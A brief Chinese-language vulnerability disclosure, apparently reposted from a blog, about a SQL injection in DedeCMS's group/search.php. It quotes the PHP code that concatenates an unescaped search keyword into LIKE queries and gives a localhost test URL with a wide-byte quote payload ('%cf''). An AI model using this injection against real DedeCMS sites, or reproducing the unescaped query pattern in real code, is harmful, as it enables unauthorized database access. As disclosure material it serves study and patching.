漏洞发者:落叶粪飞
友情发布到
马骏's blogdedecms漏洞还有几个 打算每天发布一个了
-----------------------------------------------------------------------------
注射group/search.php
................................................................................................
if(empty($sad)) $sad = "t";
if(empty($keyword)){
ShowMsg("错误,请输入搜索关键字!","-1");
exit();
}
if($sad=="g"){
$searchtable = "
#@__groups";
$WhereSql = "WHERE ishidden=0 AND groupname like '%".$keyword."%'";
$Orders = "ORDER BY stime DESC";
}else{
$searchtable = "
#@__group_threads";
$WhereSql = "WHERE closed=0 AND subject like '%".$keyword."%'";
$Orders = "ORDER BY lastpost DESC";
}
..............................................................................................
http://127.0.0.1/dg/group/search.php?sad=g&keyword=%cf'
